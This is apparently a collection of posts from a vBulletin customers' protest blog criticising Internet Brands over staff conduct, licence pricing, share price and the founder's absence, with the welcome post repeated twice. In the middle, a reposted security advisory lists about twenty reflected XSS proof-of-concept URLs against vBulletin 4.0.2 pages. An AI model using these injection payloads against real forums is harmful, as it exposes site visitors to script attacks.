vBulletin Staff – Behind the Curtains

First, let me start by saying a big thank you to Internet Brands, and the staff at vBulletin. Thank you for not making me regret my decision to ditch vBulletin, for the far superior XenForo. Thank you for continuing in the downwards spiral that you have been going in, one which will ultimately lead to your demise.

It has been some time since I last visited vBulletin forums. Still having an active vBulletin license, I do like to frequent the forums time to time to read about the latest happenings, but in truth mostly to get a good chuckle out of the mess vBulletin has become. Recently, I was browsing the “Licensed Customer Feedback” forum and a thread caught my attention and actually shocked me. This forum is a private forum only accessible to current licensed members of vBulletin, and is not visible to the public, which is most certainly a good thing for Internet Brands because it allows them to hide and censor the reality of the debacle that is now vBulletin.

Recently, a new staff member joined the team – Lawrence Cole. Here I was thinking it couldn’t possibly get any worse for vB, then they surprise me yet again by hiring this 34 year old man who behaves like a child. Having read many of his posts in the private forums, it was apparent that he is completely unprofessional and has no respect for the customers. He engages to cheap tactics and resorts to name calling, belittling and being all out rude to customers. His excuse and justification was essentially (paraphrasing) “if you attack me, I’ll attack you” I think he fails to understand that he is a staff member, one who should be focusing on CSR and not engaging in picking fights with customers. Do any of the other staff members come in to support the customers? No why would they actually care about concerns have, instead they let the thread, and bashing by the staff member continue, until he decides to close the thread.

Don’t take my word for it, have a look at what happens behind the closed doors, if only the public knew just how bad it was in this private forum.

In sum, there is no excuse for someone in his position to behaving this way towards paying customers. Even if other customers were “attacking” him, the solution is not to retaliate in this manner, as a customer I would expect them to approach it in a professional, courteous matter…then again this is vBulletin and it seems that shipped sailed long ago.

Internet Brands, enjoy the customers you have, it’s only a matter of time before the remaining ones you have follow the rest of us and move on from vBulletin to bigger and better things. The primary reason you are even able to get new customers is because you censor any signs of conflict in the public forums, and allow it to go in in the private forums that new members (and potentially new customers) have no knowledge of. This ruse is a temporary solution, and since you will do nothing for an actual solution, it will be just that – temporary. Enjoy it while it lasts.

Security Alert: Multiple XSS Vulnerabilities in Internet Brands’s vBulletin 4 Forum and vBulletin 4 Suite

Vendor: Internet Brands (NASDAQ: INET)
Product: vBulletin 4 Forum, vBulletin 4 Suite
Version: 4.0.2
Vector of Attack: Cross Site Scripting
Source: Inje3ct0rvBulletin.com

Details:

# Exploit  :
http://127.0.0.1/upload/calendar.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/faq.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forum.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/usercp.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/subscription.php?
acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showgroups.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/sendmessage.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/search.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/register.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/profile.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/private.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/online.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/newthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/misc.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/memberlist.php?=>”‘><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/member.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/inlinemod.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/index.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forumdisplay.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
Additional vulnerabilities found by vBulletin Forum Members
http://127.0.0.1/upload/content.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/blog.php/>”><ScRiPt>alert(213771818860)</ScRiPt>

The Real Faces Behind Internet Brands

Highway Robbery

I was tutoring this weekend and I helped an 11th grade high school student with US History.  He pointed out to me that history is useless, but I retorted that if we never learn from history, history has a tendency to repeat itself. That gave me reason to pause as I thought how that very logic applies to our scenario. Internet Brands did this once to us, what’s not to say they will do it again?

Let’s face the truth. I got my credit card bill last week, and it’s simply highway robbery. I cringed at the fact I had to pay just to do an upgrade. Sure $130.00 doesn’t seem much, but when you combine the fact that our license was suppose to be worth $160.00 (or $180.00 for others), we’re still paying more than $235.00 for a brand new license! What Internet Brands is making us pay is simply highway robbery. I don’t know how else to put it.

I don’t see ANY reason at all to justify existing license holders paying more. Essentially we’re being told to just pony up money for a brand new license. Forget what Internet Brands has told you; it’s merely a ploy, a cover. It’s purely marketing. Rip off all the marketing, and you’ll see is that we’re paying for a brand new license.

As existing Legacy vBulletin license holders, we’re treated as second rate citizens. We’re not important to them. Our wallets are more important to them. What’s not to say this is to happen again when vBulletin 5 arrives on the horizon?

We’re stuck holding a useless, absolutely pointless license vBulletin 3 license. After our license expires per-se, no more updates.  No more security patches. Once vBulletin 4 goes into full swing, vBulletin 3 citizens are treated as the scorn of the earth. Internet Brands manipulated us using fear tactics so that we’d buy licenses.

I really sympathize with those who bought vBulletin licenses really late in the game before vBulletin 4 was announced. Anyone who bought a license merely hours or days before vBulletin 4 got announced feel the real wrath. They bought a license only to have it invalidated and ripped from their hands minutes later.

Yet when they protest that they’ve been scammed, they’re told to upgrade to the latest vBulletin 4 License by paying even more? Any more protests, and you have threads closed. Has anyone checked out Pre-Sales recently? There are several threads in which customers point out that they don’t treat customers well.

Has anyone at Internet Brands done the math? We’re paying MORE for upgrading to a vBulletin 4 license than brand new vBulletin 4 license holders. Where’s the justice? Where’s the respect? More importantly, where’s the loyalty to your existing customer base that made vBulletin so successful? If they’re treating customers like this, as a shareholder, stakeholder or investors I’d wonder how Internet Brands may very well treat me in the future.

Let’s face it. vBulletin 3 license holders have been screwed over. If history has anything to say, it’s that it’s going to happen again.

IB shares plummet

Today marked a gloomy event for investors in IB.

IB currently does not pay dividends to its investors, and their low share pricing is an obvious reflection of the distasteful reactions of vBulletin Customers.

deuterium, (formerly ct2k7) as we gather, posted in our infamous Licensed Customer Feedback section, you know… the hidden from potential customer … area, in the thread, pertaining the original article by The Register about the share falling.

Floris replied moments later, refering to deuterium by his first name, explaining that this was common ( or realistic) with the release of the Q3 2009 financial results.

In some cases this was true, but obviously, a drop of nearly 12% was something out of the ordinary. It was nearly enough to warrant its little space on Yahoo!’s Biggest Losers page.

Those using the Google finance page to track the shares will have noticed the amount of publicity Internet Brands is gaining from its treatment of its customers, something which is personally thought to be a major role in this, as investors see what’s going on behind closed doors.

More Numbers: Press: 2, History Books +1, Internet Brands: 0

There’s one thing you could appreciate when reading business journals, magazines, and text books: they show you three outcomes, the right way, the wrong way, and the ugly. And boy, it’s starting to get ugly, and it’s not only coming from customers, but from observers outside in the business world.

Internet Brands officially today became a case study on how not to do things. The question now is “How will history look back at Internet Brands?” Will they be looked as a company who made resolutions and gestures to resolve matters with their customer base? Or will they end up as dust in the wind, shunned, and labeled as pariahs?

But do read the case study.

Fair Use Excerpt:

Software licensing can be a tough business. But if you’re able to build a great product and acquire customers, it can be a rewarding business. The founders of Jelsoft, the company behind the popular vBulletin message board software, know that first hand.

Having built arguably the best message board software out there, they sold Jelsoft to Internet Brands in 2007 for an undisclosed amount. And two years later, Internet Brands is facing a violent customer revolt over a new product and new licensing terms.

Bite the hand that feeds you Internet Brands, and that body who controls the hand will fight back, tooth and nail.

Casualty Count

I’ve been watching from the sidelines as the Internet Brands PR machine have been spinning and spinning everything possible. We saw the launch of vBulletin 4.0 Alpha.. I mean Beta (heck, it feels like an early Alpha) on vBulletin.com.

But between last week’s announcement, and this week, I wanted to know what have you decided as a license holder. I’ve seen it all on the last few weeks, but Internet Brands spins it that they’re achieving record sales. Yet the question I want to ask to everyone is Who what have you honestly decided? Stay? Moved to IPB? MyBB maybe? Or another solution?

Let’s try to quantify the number of who has actually decided to stay or move on from Internet Brands and vBulletin. Leave a comment and let the world know whether you decided to stay or not, and why.

So where IS James?

Ever since Internet Brands bought Jelsoft Enterprises Ltd in 2007, the activity of James has been dwindling.James has not posted or even logged into the vBulletin forums (no last activity recorded) since January of this year. In April of this year, one member sifted through some documents from the Companies House, suggesting that James had quit his role. vBulletin Staff insisted that James “was very much with us” prior to closing the thread.

Right now, the support staff are bearing the backlash from the customers, but where is James? Is it true that he has retired completely from Jelsoft?

There are many question unanswered, and Internet Brands wants them to remain unaswered.

The Truth of Who I Am

Before I start anything, let me welcome you. Welcome to vBtruth.com.
I want to share with you a bit of who I am. I’m a current vBulletin license holder for seven plus years now. Over these last seven years, I’ve had the pleasure to work with some of the greatest community people. You might know some of the name: John Percival, Chen (Firefly), DirectPixel, Alfarin, ManagerJosh, Scott MacVicar, Mike Sullivan, Kier Darby, Steve Machol, Onimua, Xiphoid, Sinecure, and so forth. I’ve had the pleasure of meeting a few vBulletin owners in my lifetime, and some have become friends over the years outside of the vBulletin community
Needless to say, I’ve been here a while. But if you need a reference point, I’ve been with the vBulletin family since version 2.2.x series.
I’ve decided enough is enough, and that I can no longer keep my silence. Ultimately, I’ve decided that I need to put my thoughts out here with fellow vBulletin owners where censorship is out of the reach of Internet Brands and that I can post my thoughts without fears of reprocussions.
I will be the first person to admit that I probably should have spoken up sooner after the acquisition of Jelsoft and vBulletin. All the signs were there. Simply put, the acquisition is considered a defining moment, a crucial moment in the history of what vBulletin is. It’s a point where vBulletin will either succeed or fail.
Thus far, nothing presented has instilled any confidence whatsoever, and is further compounded by the sudden and unexpected resignation of many developers who use to work on vBulletin.
As you’ve probably figured out, I’ve seen many things during my time here with vBulletin. The changing of Project Managers. The new team members. The new faces of Jelsoft and Internet Brands. But for the moment, I want to shine a light on vBulletin 4, and what a complete and utter mess it is.
Simply put to the investors and stakeholders of Internet Brands, You should be asking questions, and asking the HARD questions. The questions shouldn’t be will I get a return on my investment, but rather are your actions maximizing my return in the best possible way? I would argue no.
It is my opinion that Internet Brands is trying to rapidly increase revenue and maximize return, however, they are going about this in a way that has certainly rubbed customers the wrong way. Certainly the bottom line is important, but the reality is that in the attempt to add more value and cash into your investments is going to leave a negative return on your investment. I will explain more and let you do the math and draw conclusions.
Internet Brands no longer has the favor of customers. Certain decisions and their outcomes have shaken the community one too many times. The goodwill has been burned through. Trust and Loyalty has been thrown out the window. Years have been invested in order to build up a solid repuitation and brand, and it has taken Internet Brands a few months to destroy it and leave many of its most loyal customers frazzled, concerned, upset, and uncertain.
Are you frazzled like me? I hope you’ll stick around and air out your dirty laundry with us.
P.S. Special Thanks to a few vBulletin friends who stepped up to provide hosting and domains. We’re rather grateful they’re sticking out their necks a bit to provide some space for us.

Before I start anything, let me welcome you. Welcome to vBtruth.com.

I want to share with you a bit of who I am. I’m a current vBulletin license holder for seven plus years now. Over these last seven years, I’ve had the pleasure to work with some of the greatest community people. You might know some of the name: John Percival, Chen (Firefly), DirectPixel, Alfarin, Scott MacVicar, Mike Sullivan, Kier Darby, Steve Machol, Onimua, Xiphoid, Sinecure, and so forth. I’ve had the pleasure of meeting a few vBulletin owners in my lifetime, and some have become friends over the years outside of the vBulletin community

Needless to say, I’ve been here a while. But if you need a reference point, I’ve been with the vBulletin family since version 2.2.x series.

I’ve decided enough is enough, and that I can no longer keep my silence. Ultimately, I’ve decided that I need to put my thoughts out here with fellow vBulletin owners where censorship is out of the reach of Internet Brands and that I can post my thoughts without fears of reprocussions.

I will be the first person to admit that I probably should have spoken up sooner after the acquisition of Jelsoft and vBulletin. All the signs were there. Simply put, the acquisition is considered a defining moment, a crucial moment in the history of what vBulletin is. It’s a point where vBulletin will either succeed or fail.

Thus far, nothing presented has instilled any confidence whatsoever, and is further compounded by the sudden and unexpected resignation of many developers who use to work on vBulletin and other significant actions that have completely undermined the confidence of all license holders.

As you’ve probably figured out, I’ve seen many things during my time here with vBulletin. The changing of Project Managers. The new team members. The new faces of Jelsoft and Internet Brands. But for the moment, I want to shine a light on vBulletin 4, and what a complete and utter mess it is.

Simply put to the investors and stakeholders of Internet Brands, You should be asking questions, and asking the HARD questions. The questions shouldn’t be will I get a return on my investment, but rather are your actions maximizing my return in the best possible way? I would argue no.

It is my opinion that Internet Brands is trying to rapidly increase revenue and maximize return, however, they are going about this in a way that has certainly rubbed customers the wrong way. Certainly the bottom line is important, but the reality is that in the attempt to add more value and cash into your investments is going to leave a negative return on your investment. I will explain more and let you do the math and draw conclusions.

Internet Brands no longer has the favor of customers. Certain decisions and their outcomes have shaken the community one too many times. The goodwill has been burned through. Trust and Loyalty has been thrown out the window. Years have been invested in order to build up a solid repuitation and brand, and it has taken Internet Brands a few months to destroy it and leave many of its most loyal customers frazzled, concerned, upset, and uncertain.

Are you frazzled like me? I hope you’ll stick around and air out your dirty laundry with us.

P.S. Special Thanks to a few vBulletin friends who stepped up to provide hosting and domains. We’re rather grateful they’re sticking out their necks a bit to provide some space for us.